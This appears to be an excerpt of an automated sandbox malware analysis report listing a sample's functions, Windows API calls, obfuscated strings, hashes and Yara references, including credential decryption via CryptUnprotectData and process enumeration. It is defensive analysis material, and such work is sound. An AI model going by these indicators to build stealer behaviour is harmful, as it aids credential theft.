                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <4fo$R\|~$Sm~$cHp$2}$dk
                                • API String ID: 0-2237613122
                                • Opcode ID: ceb4074522a7cce60e5a759180b5d0330c3121a3da63757c489e6790ca560ae1
                                • Instruction ID: ecdcfff22f8d650b3a57d9ba17ad7d930fa04e550deffedc5b6ba5cd17aab1f6
                                • Opcode Fuzzy Hash: ceb4074522a7cce60e5a759180b5d0330c3121a3da63757c489e6790ca560ae1
                                • Instruction Fuzzy Hash: B4B238F3A0C2049FE3046F2DEC8567ABBE9EF94720F1A453DEAC5C3744EA3558058696
                                Function 0073DDE4 Relevance: 9.1, Strings: 6, Instructions: 1579COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "_fj$1=9$[>uo$d(z$d(z${C,
                                • API String ID: 0-2816934663
                                • Opcode ID: 7b615c33ae300f1c16d3e6079dd756b1486acd0f9d1bc47d701e24c36294d717
                                • Instruction ID: fe2248988ead46cefddd7b7a8e0c5dc2ff85afda0fb8e41c838a2f622876de05
                                • Opcode Fuzzy Hash: 7b615c33ae300f1c16d3e6079dd756b1486acd0f9d1bc47d701e24c36294d717
                                • Instruction Fuzzy Hash: CEB208F360C2049FE304AE2DEC8567AFBE9EFD4720F1A492DEAC4C7744E63558058696
                                Function 003B2C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 003B2C42
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B2C49
                                • GetTimeZoneInformation.KERNEL32(?), ref: 003B2C58
                                • wsprintfA.USER32 ref: 003B2C83
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID: wwww
                                • API String ID: 3317088062-671953474
                                • Opcode ID: 011b2539de97e9d90aba4a957fa3374f6b0c79bec6db848e17cd059da7a8e846
                                • Instruction ID: cc02533ab3ac6ea7263d969a1411562fd8d5f18ac769303de1054359b4e10d8f
                                • Opcode Fuzzy Hash: 011b2539de97e9d90aba4a957fa3374f6b0c79bec6db848e17cd059da7a8e846
                                • Instruction Fuzzy Hash: 7601F271A00A04AFCB188B58DC0EFAABB69EB84721F004369F916DB6C0D77429088AD1
                                Function 0074E785 Relevance: 7.8, Strings: 5, Instructions: 1537COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: :]>$C"}$PA{s$oO?w$su/}
                                • API String ID: 0-3316869636
                                • Opcode ID: b4fcd7dc6527215cff40b1a81b676f8b1187f23f2bf83bdb58edd953730b369c
                                • Instruction ID: 904b8700e4c73e9e5d86e0e2858e91edfccf429f1ff496925e92e34bc0394c60
                                • Opcode Fuzzy Hash: b4fcd7dc6527215cff40b1a81b676f8b1187f23f2bf83bdb58edd953730b369c
                                • Instruction Fuzzy Hash: FBB204F390C2049FE3046F2DEC8567ABBE9EF94720F1A492DEAC483744EA3558448797
                                Function 003B1B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 003B1B72
                                  • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B184F
                                  • Part of subcall function 003B1820: lstrlen.KERNEL32(00F66F50), ref: 003B1860
                                  • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003B1887
                                  • Part of subcall function 003B1820: lstrcat.KERNEL32(00000000,00000000), ref: 003B1892
                                  • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003B18C1
                                  • Part of subcall function 003B1820: lstrlen.KERNEL32(003C4FA0), ref: 003B18D3
                                  • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003B18F4
                                  • Part of subcall function 003B1820: lstrcat.KERNEL32(00000000,003C4FA0), ref: 003B1900
                                  • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003B192F
                                • sscanf.NTDLL ref: 003B1B9A
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 003B1BB6
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 003B1BC6
                                • ExitProcess.KERNEL32 ref: 003B1BE3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                • String ID:
                                • API String ID: 3040284667-0
                                • Opcode ID: a0cd5f30eb1fe3277af45cc30a5a192ae7e780b571490f40d1f72f3f1a7f4907
                                • Instruction ID: df48f3a05c37a2efa285d48d44845ce7300666475d6b76219e2479966e7c2156
                                • Opcode Fuzzy Hash: a0cd5f30eb1fe3277af45cc30a5a192ae7e780b571490f40d1f72f3f1a7f4907
                                • Instruction Fuzzy Hash: 2421E4B2518301AF8354DF65D88889BBBF8FED8314F408A1EF599D3220E730D5088BA6
                                Function 00397750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0039775E
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00397765
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0039778D
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003977AD
                                • LocalFree.KERNEL32(?), ref: 003977B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 6265a776499dd1941917503e213f86670e7fe35670362e02dd0cf5cdb66f7771
                                • Instruction ID: e0b7974ac0550246ea55debe436b346bdfbde6f25607419ba45e490465946d20
                                • Opcode Fuzzy Hash: 6265a776499dd1941917503e213f86670e7fe35670362e02dd0cf5cdb66f7771
                                • Instruction Fuzzy Hash: 86011E75B40308BFEB10DB949C4EFAA7B78EB44B15F104195FB09EA2C0D6B0A904CB94
                                Function 0074B9DF Relevance: 7.3, Strings: 5, Instructions: 1037COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 7Te^$8cRf$aToC$c$v=e
                                • API String ID: 0-308265804
                                • Opcode ID: b96cfd0542450ab7feee18b4fac75524ec656890ebbad9ad1df999ee2ab30dbc
                                • Instruction ID: 85eb19ab1513b2d5125b627af91253066c130063f3d2c7108c517e2effaa425a
                                • Opcode Fuzzy Hash: b96cfd0542450ab7feee18b4fac75524ec656890ebbad9ad1df999ee2ab30dbc
                                • Instruction Fuzzy Hash: A962F9F360C204AFE7046E2DEC8577AB7E9EB94320F1A4A3DE6C5C7744E63598018796
                                Function 00749810 Relevance: 6.6, Strings: 4, Instructions: 1623COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: SK]$`.{o$`rUr$v}m
                                • API String ID: 0-392878372
                                • Opcode ID: d5712e4f38d63e68b79edc538faaec5af0839ef51feced02490b58e1be10ddb6
                                • Instruction ID: 95e8c36cc19b4462321a6c31282fcf193d49a3ba1cb799652b4ed2dfe5df534b
                                • Opcode Fuzzy Hash: d5712e4f38d63e68b79edc538faaec5af0839ef51feced02490b58e1be10ddb6
                                • Instruction Fuzzy Hash: F2B2F9F3A08204AFE3046E2DEC8567BBBE9EBD4720F16493DEAC4C7744E63558058697
                                Function 007412C1 Relevance: 6.6, Strings: 4, Instructions: 1605COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: /skipactivexreg$A0{_$Ipn$j/9
                                • API String ID: 0-463640712
                                • Opcode ID: 80d9bb98c6b1e404c4529370c8d4522f7f062926ecc5055951229d836c932957
                                • Instruction ID: 103ab632e2c85dac1bf6ad6f82a159ab42107352ec1ae298b7338436e20b2bff
                                • Opcode Fuzzy Hash: 80d9bb98c6b1e404c4529370c8d4522f7f062926ecc5055951229d836c932957
                                • Instruction Fuzzy Hash: F1B2F4F3A0C6049FE304AE2DEC8567ABBE5EF94320F16493DEAC5C7344EA3558058697
                                Function 003B3A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003B3A96
                                • Process32First.KERNEL32(00000000,00000128), ref: 003B3AA9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 003B3ABF
                                  • Part of subcall function 003B7310: lstrlen.KERNEL32(------,00395BEB), ref: 003B731B
                                  • Part of subcall function 003B7310: lstrcpy.KERNEL32(00000000), ref: 003B733F
                                  • Part of subcall function 003B7310: lstrcat.KERNEL32(?,------), ref: 003B7349
                                  • Part of subcall function 003B7280: lstrcpy.KERNEL32(00000000), ref: 003B72AE
                                • CloseHandle.KERNEL32(00000000), ref: 003B3BF7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: d28f53ebdb8dfad2fdf971aba370d9ddf9beac8c69597bbabcff5e212fad9a84
                                • Instruction ID: a47d3ce613ebdc91b4c73948582f07197c5017647868b41e6cc21c37f496b896
                                • Opcode Fuzzy Hash: d28f53ebdb8dfad2fdf971aba370d9ddf9beac8c69597bbabcff5e212fad9a84
                                • Instruction Fuzzy Hash: CB811430905624CFC71ACF19C888B95B7F1FF44328F2AC1A9D5099B6A6D7769D86CF80
                                Function 0039EA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0039EA76
                                • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0039EA7E
                                • lstrcat.KERNEL32(003BCFEC,003BCFEC), ref: 0039EB27
                                • lstrcat.KERNEL32(003BCFEC,003BCFEC), ref: 0039EB49
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
